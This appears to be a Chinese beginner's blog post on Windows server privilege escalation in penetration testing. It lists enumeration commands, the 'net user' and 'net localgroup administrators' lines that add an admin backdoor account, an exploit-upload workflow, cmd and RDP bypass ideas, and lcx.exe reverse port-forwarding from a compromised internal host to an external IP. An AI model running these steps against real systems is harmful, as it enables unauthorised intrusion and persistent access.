美文网首页
【渗透测试】-服务器提权之初入茅庐

【渗透测试】-服务器提权之初入茅庐

作者: lndyzwdxhs | 来源:发表于2017-08-11 13:31 被阅读105次

    0x01:什么情况下会用到提权?

    • 旁注
      • 对同服务器下的不同站点进行渗透,达到对目标站点的渗透
    • C段
      • 对同网段下的不同服务器进行渗透,达到对目标服务器的目标站点的渗透

    0x02:提权常用命令

    • Windows:
      • Whoami 查看当前操作用户
      • Ipconfig ip地址获取命令
      • Net user用户操作命令
        • Net user cs 123456 /add 添加用户名cs,密码123456的用户
        • Net user cs /del 删除用户cs
        • Net localgroup administrators cs /add 将用户cs添加到本地管理员组
      • Tasklist /svc 进程获取命令
      • Netstat -ano 网络端口命令
      • Systeminfo 计算机信息获取命令
    • Linux:
      • 待续...

    0x03:提权技术分类

    • 溢出漏洞提权
      • 提权准备,信息收集(操作系统版本、位数、补丁情况、有无防护软件)
      • 对比补丁及操作系统信息,筛选出exp(可以使用提权exp工具)
      • 执行exp进行提权
        • 寻找可读可写目录(目录探测工具或者webshell自带),上传exp
        • 执行exp,添加用户并设置为管理员权限,远程连接
    • 数据库提权
    • 第三方软件提权

    0x04:提权遇到的问题?

    • cmd无法执行

      • cmd被删除

        • 绕过思路:找可读可写目录,上传cmd.exe
      • cmd被降权

        • 绕过思路:找可读可写目录,上传cmd.exe
      • 组件被删除

        • 切换组件
      • 防护软件拦截

        • 很难绕过
    • 3389无法连接

      • 端口被修改
        • 找端口(1-65535),使用端口扫描工具、注册表读取、查询PID
      • 端口被关闭
        • 上传3389打开工具到可读可写目录,需要先提权,调用执行exe工具
      • 内网环境
        • 端口转发:
          1. 外网服务器:lcx.exe -listen 1234 4321 (监听1234端口的流量并将其转发至本地4321端口)
          2. 内网肉鸡:lcx.exe -slave 121.43.99.73 1234 192.168.1.106 1111 (将本地192.168.1.106的1111端口流量转发至121.43.99.73的1234端口上)
          3. 外网 连接本地端口4321 即代表连接肉鸡的1111端口
      • 防护软件拦截
        • 很困难

    欢迎关注微信公众号(coder0x00)或扫描下方二维码关注,我们将持续搜寻程序员必备基础技能包提供给大家。


    相关文章

      网友评论

          本文标题:【渗透测试】-服务器提权之初入茅庐

          本文链接:https://www.haomeiwen.com/subject/mmblrxtx.html